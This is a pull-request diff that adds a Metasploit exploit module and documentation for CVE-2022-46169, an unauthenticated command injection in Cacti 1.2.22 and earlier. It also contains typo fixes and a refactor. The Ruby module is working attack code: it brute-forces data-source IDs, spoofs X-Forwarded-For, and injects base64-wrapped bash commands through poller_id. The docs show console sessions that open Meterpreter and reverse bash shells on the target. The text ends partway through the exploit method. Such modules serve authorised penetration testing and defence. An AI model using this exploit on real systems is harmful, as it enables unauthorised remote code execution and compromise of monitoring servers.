### PR TITLE
Add cacti_unauthenticated_cmd_injection module and docs (CVE-2022-46169)

### DIFF
--- a/documentation/modules/exploit/linux/http/cacti_unauthenticated_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/cacti_unauthenticated_cmd_injection.md
@@ -59,7 +59,7 @@ The `host_id` value to use. By default, the module will try to bruteforce this.
 ### LOCAL_DATA_ID
 The `local_data_id` value to use. By default, the module will try to bruteforce this.
 ### X_FORWARDED_FOR_IP
-The IP to use in the `X-Forwared-For` HTTP header. This should be resolvable to a hostname in the poller table. Default: 127.0.0.1
+The IP to use in the `X-Forwarded-For` HTTP header. This should be resolvable to a hostname in the poller table. Default: 127.0.0.1
 
 ## Advanced Options
 ### MIN_HOST_ID
@@ -101,7 +101,7 @@ Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
    TARGETURI           /                yes       The base path to Cacti
    URIPATH                              no        The URI to use for this exploit (default is random)
    VHOST                                no        HTTP server virtual host
-   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.
 
 
 Payload options (linux/x86/meterpreter/reverse_tcp):
@@ -162,7 +162,7 @@ Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
    TARGETURI           /                yes       The base path to Cacti
    URIPATH                              no        The URI to use for this exploit (default is random)
    VHOST                                no        HTTP server virtual host
-   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.
 
 
 Payload options (cmd/unix/reverse_bash):
@@ -215,7 +215,7 @@ Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
    TARGETURI           /                yes       The base path to Cacti
    URIPATH                              no        The URI to use for this exploit (default is random)
    VHOST                                no        HTTP server virtual host
-   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.
 
 
 Payload options (linux/x86/meterpreter/reverse_tcp):

--- a/documentation/modules/exploit/linux/http/cacti_unauthenticated_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/cacti_unauthenticated_cmd_injection.md
@@ -1,0 +1,304 @@
+## Vulnerable Application
+This module exploits an unauthenticated command injection vulnerability in Cacti through 1.2.22 (CVE-2022-46169)
+in order to achieve unauthenticated remote code execution as the www-data user.
+
+The module first attempts to obtain the Cacti version to see if the target is affected.
+If `LOCAL_DATA_ID` and/or `HOST_ID` are not set, the module will try to bruteforce the missing value(s).
+For the bruteforce, the total number of possible requests is limited to 1,000.
+However, it is possible to set the range for the `local_data_id` and `host_id` values to try
+via the advanced options `MIN_HOST_ID` (default 1), `MAX_HOST_ID` (default 5), `MIN_LOCAL_DATA_ID` (default 1)
+and `MAX_LOCAL_DATA_ID` (default 100).
+If a valid combination is found, the module will use these to attempt exploitation.
+If `LOCAL_DATA_ID` and/or `HOST_ID` are both set, the module will immediately attempt exploitation.
+
+The bruteforce attempt can have three possible outcomes:
+- Failure: No vulnerable `host_id` and `local_data_id` are found.
+- Success: A `host_id` and `local_data_id` combination is found that is positively identified as vulnerable.
+The module determines this by comparing the `rrd_name` returned by the server to a list of data sources known to be vulnerable.
+- Indeterminate: The module identified several `host_id` and `local_data_id` combinations for which the server returns
+an empty `rrd_name` value. Many data sources in Cacti do not have an `rrd_name` value, some of which are vulnerable.
+In this case, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it.
+Instead of trying to exploit all potentially vulnerable `host_id` and `local_data_id` combinations without an `rrd_name`,
+the module stores these.
+When the bruteforce attempt finishes with an indeterminate outcome, the list of potentially vulnerable `host_id`
+and `local_data_id` combinations is printed to the console.
+The user can then manually verify if any of these combinations are actually exploitable by using them
+to set the `HOST_ID` and `LOCAL_DATA_ID` options.
+
+During exploitation, the module sends a GET request to `/remote_agent.php` with the action parameter set to `polldata`
+and the `X-Forwarded-For` header set to the provided value for `X_FORWARDED_FOR_IP` (by default `127.0.0.1`).
+In addition, the `poller_id` parameter is set to the payload and the `host_id` and `local_data_id` parameters
+are set to the bruteforced or provided values.
+If `X_FORWARDED_FOR_IP` is set to an address that is resolvable to a hostname in the poller table,
+and the `local_data_id` and `host_id` values are vulnerable, the payload set for `poller_id` will be executed by the target.
+
+This module has been successfully tested against Cacti version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)
+
+## Installation Information
+Cacti is open source, and vulnerable versions can be obtained from the official GitHub repository under
+[releases](https://github.com/Cacti/cacti/releases).
+As a shortcut, a vulhub entry is available [here](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169)
+that allows you to spin up a vulnerable instance via a single docker-compose command.
+The vulhub page also contains instructions for how to complete the Cacti installation, how to make it vulnerable, and a PoC.
+
+Additional details about the exploit are available [here](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf)
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/cacti_unauthenticated_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+4. Do: `set SRVHOST [IP]`
+5. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to Cacti. The default value is `/`.
+### HOST_ID
+The `host_id` value to use. By default, the module will try to bruteforce this.
+### LOCAL_DATA_ID
+The `local_data_id` value to use. By default, the module will try to bruteforce this.
+### X_FORWARDED_FOR_IP
+The IP to use in the `X-Forwared-For` HTTP header. This should be resolvable to a hostname in the poller table. Default: 127.0.0.1
+
+## Advanced Options
+### MIN_HOST_ID
+Lower value for the range of possible `host_id` values to check for. Default: 1
+### MAX_HOST_ID
+Upper value for the range of possible `host_id` values to check for. Default: 5
+### MIN_LOCAL_DATA_ID
+Lower value for the range of possible local_data_id values to check for. Default: 1
+### MAX_LOCAL_DATA_ID
+Upper value for the range of possible local_data_id values to check for. Default: 100
+
+## Targets
+```
+Id  Name
+--  ----
+0   Automatic (Unix In-Memory)
+1   Automatic (Linux Dropper)
+```
+
+## Scenarios
+### Cacti 1.2.22 - Linux Dropper - HOST_ID and LOCAL_DATA_ID not set (bruteforce)
+```
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
+   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT               8080             yes       The target port (TCP)
+   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                                  resses.
+   SRVPORT             9090             yes       The local port to listen on.
+   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI           /                yes       The base path to Cacti
+   URIPATH                              no        The URI to use for this exploit (default is random)
+   VHOST                                no        HTTP server virtual host
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 505 combinations
+[*] Enumerating local_data_id values for host_id 1
+[*] Performing request 25...
+[*] Performing request 50...
+[*] Performing request 75...
+[+] Found exploitable local_data_id 180 for host_id 1
+[*] Sending stage (1017704 bytes) to 10.18.0.3
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 1 opened (192.168.91.195:4444 -> 10.18.0.3:45322) at 2022-12-22 16:43:59 +0200
+
+meterpreter > getuid
+Server username: www-data
+```
+
+### Cacti 1.2.22 - Unix In-Memory - HOST_ID and LOCAL_DATA_ID set (immediate exploitation)
+```
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   HOST_ID             1                no        The host_id value to use. By default, the module will try to bruteforce this.
+   LOCAL_DATA_ID       182              no        The local_data_id value to use. By default, the module will try to bruteforce this.
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT               8080             yes       The target port (TCP)
+   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                                  resses.
+   SRVPORT             9090             yes       The local port to listen on.
+   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI           /                yes       The base path to Cacti
+   URIPATH                              no        The URI to use for this exploit (default is random)
+   VHOST                                no        HTTP server virtual host
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Unix In-Memory)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Executing the payload. This may take a few seconds...
+[*] Command shell session 1 opened (192.168.91.195:4444 -> 10.18.0.3:50802) at 2022-12-22 16:51:46 +0200
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Cacti 1.2.22 - Linux Dropper - HOST_ID and LOCAL_DATA_ID not set (bruteforce with undetermined result, then manual exploitation)
+```
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
+   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT               8080             yes       The target port (TCP)
+   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                                  resses.
+   SRVPORT             9090             yes       The local port to listen on.
+   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI           /                yes       The base path to Cacti
+   URIPATH                              no        The URI to use for this exploit (default is random)
+   VHOST                                no        HTTP server virtual host
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
+[*] Enumerating local_data_id values for host_id 1
+[*] Performing request 25...
+[*] Performing request 50...
+[*] Performing request 75...
+[*] Performing request 100...
+[*] Enumerating local_data_id values for host_id 2
+[*] Performing request 125...
+[*] Performing request 150...
+[*] Performing request 175...
+[*] Performing request 200...
+[*] Enumerating local_data_id values for host_id 3
+[*] Performing request 225...
+[*] Performing request 250...
+[*] Performing request 275...
+[*] Performing request 300...
+[*] Enumerating local_data_id values for host_id 4
+[*] Performing request 325...
+[*] Performing request 350...
+[*] Performing request 375...
+[*] Performing request 400...
+[*] Enumerating local_data_id values for host_id 5
+[*] Performing request 425...
+[*] Performing request 450...
+[*] Performing request 475...
+[*] Performing request 500...
+[!] Identified 15 host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:
+        host_id: 1 - local_data_id: 156
+        host_id: 1 - local_data_id: 157
+        host_id: 1 - local_data_id: 158
+        host_id: 1 - local_data_id: 164
+        host_id: 1 - local_data_id: 166
+        host_id: 1 - local_data_id: 167
+        host_id: 1 - local_data_id: 168
+        host_id: 1 - local_data_id: 169
+        host_id: 1 - local_data_id: 170
+        host_id: 1 - local_data_id: 173
+        host_id: 1 - local_data_id: 174
+        host_id: 1 - local_data_id: 175
+        host_id: 1 - local_data_id: 176
+        host_id: 1 - local_data_id: 177
+        host_id: 1 - local_data_id: 178
+[*] You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options
+[-] Exploit aborted due to failure: no-target: Failed to identify an exploitable host_id - local_data_id combination.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set host_id 1
+host_id => 1
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set local_data_id 156
+local_data_id => 156
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Sending stage (1017704 bytes) to 10.18.0.3
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 2 opened (192.168.91.195:4444 -> 10.18.0.3:54964) at 2022-12-22 16:56:42 +0200
+
+meterpreter > getuid
+Server username: www-data
+```

--- a/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb
+++ b/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
           During exploitation, the module sends a GET request to
           /remote_agent.php with the action parameter set to polldata
           and the X-Forwarded-For header set to the provided value for
-          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addtion, the
+          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the
           poller_id parameter is set to the payload and the host_id
           and local_data_id parameters are set to the bruteforced or
           provided values. If X_FORWARDED_FOR_IP is set to an address
@@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2022-46169'],
           ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details
-          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'] # vulhub vulnerable docker image and PoC
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC
+          ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller
         ],
         'DefaultOptions' => {
           'RPORT' => 8080
@@ -104,34 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote
       OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),
       OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])
     ])
-  end
-
-  def x_forwarded_for_ip
-    datastore['X_FORWARDED_FOR_IP']
-  end
-
-  def host_id
-    datastore['HOST_ID']
-  end
-
-  def local_data_id
-    datastore['LOCAL_DATA_ID']
-  end
-
-  def min_host_id
-    datastore['MIN_HOST_ID']
-  end
-
-  def max_host_id
-    datastore['MAX_HOST_ID']
-  end
-
-  def min_local_data_id
-    datastore['MIN_LOCAL_DATA_ID']
-  end
-
-  def max_local_data_id
-    datastore['MAX_LOCAL_DATA_ID']
   end
 
   def check
@@ -191,19 +164,19 @@ class MetasploitModule < Msf::Exploit::Remote
     if @host_id
       host_ids = [@host_id]
     else
-      if max_host_id < min_host_id
+      if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID']
         fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')
       end
-      host_ids = (min_host_id..max_host_id).to_a
+      host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a
     end
 
     if @local_data_id
       local_data_ids = [@local_data_ids]
     else
-      if max_local_data_id < min_local_data_id
+      if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID']
         fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')
       end
-      local_data_ids = (min_local_data_id..max_local_data_id).to_a
+      local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a
     end
 
     # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id
@@ -229,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Remote
         end
 
         unless res.code == 200
-          print_error("Recevied unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")
+          print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")
           return nil
         end
 
@@ -267,7 +240,7 @@ class MetasploitModule < Msf::Exploit::Remote
           print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")
           return [h_id, ld_id]
         else
-          next # if we have a valid rr_name but it's not in the exploitable_rrd_names array, we should move on
+          next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on
         end
       end
     end
@@ -290,8 +263,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @host_id = host_id if host_id.present?
-    @local_data_id = local_data_id if local_data_id.present?
+    @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present?
+    @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present?
 
     unless @host_id && @local_data_id
       brute_force_result = brute_force_ids
@@ -314,7 +287,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),
       'headers' => {
-        'X-Forwarded-For' => x_forwarded_for_ip
+        'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP']
       },
       'vars_get' => {
         'action' => 'polldata',

--- a/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb
+++ b/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb
@@ -1,0 +1,325 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cacti 1.2.22 unauthenticated command injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection
+          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in
+          order to achieve unauthenticated remote code execution as the
+          www-data user.
+
+          The module first attempts to obtain the Cacti version to see
+          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID
+          are not set, the module will try to bruteforce the missing
+          value(s). If a valid combination is found, the module will
+          use these to attempt exploitation. If LOCAL_DATA_ID and/or
+          HOST_ID are both set, the module will immediately attempt
+          exploitation.
+
+          During exploitation, the module sends a GET request to
+          /remote_agent.php with the action parameter set to polldata
+          and the X-Forwarded-For header set to the provided value for
+          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addtion, the
+          poller_id parameter is set to the payload and the host_id
+          and local_data_id parameters are set to the bruteforced or
+          provided values. If X_FORWARDED_FOR_IP is set to an address
+          that is resolvable to a hostname in the poller table, and the
+          local_data_id and host_id values are vulnerable, the payload
+          set for poller_id will be executed by the target.
+
+          This module has been successfully tested against Cacti
+          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Owen Gong', # @phithon_xg - vulhub PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2022-46169'],
+          ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'] # vulhub vulnerable docker image and PoC
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 8080
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2022-12-05',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),
+      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),
+      OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),
+      OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),
+      OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),
+      OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),
+      OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])
+    ])
+  end
+
+  def x_forwarded_for_ip
+    datastore['X_FORWARDED_FOR_IP']
+  end
+
+  def host_id
+    datastore['HOST_ID']
+  end
+
+  def local_data_id
+    datastore['LOCAL_DATA_ID']
+  end
+
+  def min_host_id
+    datastore['MIN_HOST_ID']
+  end
+
+  def max_host_id
+    datastore['MAX_HOST_ID']
+  end
+
+  def min_local_data_id
+    datastore['MIN_LOCAL_DATA_ID']
+  end
+
+  def max_local_data_id
+    datastore['MAX_LOCAL_DATA_ID']
+  end
+
+  def check
+    # sanity check to see if the target is likely Cacti
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Login to Cacti')
+      return CheckCode::Safe('Target is not a Cacti application.')
+    end
+
+    # get the version
+    version = res.body.scan(/Version (.*?) \| \(c\)/)&.flatten&.first
+    if version.blank?
+      return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.')
+    end
+
+    begin
+      if Rex::Version.new(version) <= Rex::Version.new('1.2.22')
+        return CheckCode::Appears("The target is Cacti version #{version}")
+      else
+        return CheckCode::Safe("The target is Cacti version #{version}")
+      end
+    rescue StandardError => e
+      return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}")
+    end
+  end
+
+  def exploitable_rrd_names
+    [
+      'apache_total_kbytes',
+      'apache_total_hits',
+      'apache_total_hits',
+      'apache_total_kbytes',
+      'apache_cpuload',
+      'boost_avg_size',
+      'boost_peak_memory',
+      'boost_records',
+      'boost_table',
+      'ExportDuration',
+      'ExportGraphs',
+      'syslogRuntime',
+      'tholdRuntime',
+      'polling_time',
+      'uptime',
+    ]
+  end
+
+  def brute_force_ids
+    # perform a sanity check first
+    if @host_id
+      host_ids = [@host_id]
+    else
+      if max_host_id < min_host_id
+        fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')
+      end
+      host_ids = (min_host_id..max_host_id).to_a
+    end
+
+    if @local_data_id
+      local_data_ids = [@local_data_ids]
+    else
+      if max_local_data_id < min_local_data_id
+        fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')
+      end
+      local_data_ids = (min_local_data_id..max_local_data_id).to_a
+    end
+
+    # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id
+    max_attempts = host_ids.length * local_data_ids.length
+    if max_attempts > 1000
+      fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.')
+    end
+
+    potential_targets = []
+    request_ct = 0
+
+    print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations")
+    host_ids.each do |h_id|
+      print_status("Enumerating local_data_id values for host_id #{h_id}")
+      local_data_ids.each do |ld_id|
+        request_ct += 1
+        print_status("Performing request #{request_ct}...") if request_ct % 25 == 0
+
+        res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000)))
+        unless res
+          print_error('No response received. Aborting bruteforce')
+          return nil
+        end
+
+        unless res.code == 200
+          print_error("Recevied unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")
+          return nil
+        end
+
+        begin
+          parsed_response = JSON.parse(res.body)
+        rescue JSON::ParserError
+          print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce")
+          return nil
+        end
+
+        unless parsed_response.is_a?(Array)
+          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")
+          return nil
+        end
+
+        # the array can be empty, which is not an error but just means the local_data_id is not exploitable
+        next if parsed_response.empty?
+
+        first_item = parsed_response.first
+        unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) }
+          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")
+          return nil
+        end
+
+        # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array
+        # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it
+        # in addition, some data source types have an empty rrd_name but are still exploitable
+        # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it
+        # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end
+        # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options
+        rrd_name = first_item['rrd_name']
+        if rrd_name.empty?
+          potential_targets << [h_id, ld_id]
+        elsif exploitable_rrd_names.include?(rrd_name)
+          print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")
+          return [h_id, ld_id]
+        else
+          next # if we have a valid rr_name but it's not in the exploitable_rrd_names array, we should move on
+        end
+      end
+    end
+
+    return nil if potential_targets.empty?
+
+    # inform the user about potential targets
+    print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:")
+    potential_targets.each do |h_id, ld_id|
+      print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}")
+    end
+    print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options')
+    nil
+  end
+
+  def execute_command(cmd, _opts = {})
+    # use base64 encoding to get around special char limitations
+    cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`"
+    send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0)
+  end
+
+  def exploit
+    @host_id = host_id if host_id.present?
+    @local_data_id = local_data_id if local_data_id.present?
+
+    unless @host_id && @local_data_id
+      brute_force_result = brute_force_ids
+      unless brute_force_result
+        fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.')
+      end
+      @host_id, @local_data_id = brute_force_result
+    end
+
+    if target.arch.first == ARCH_CMD
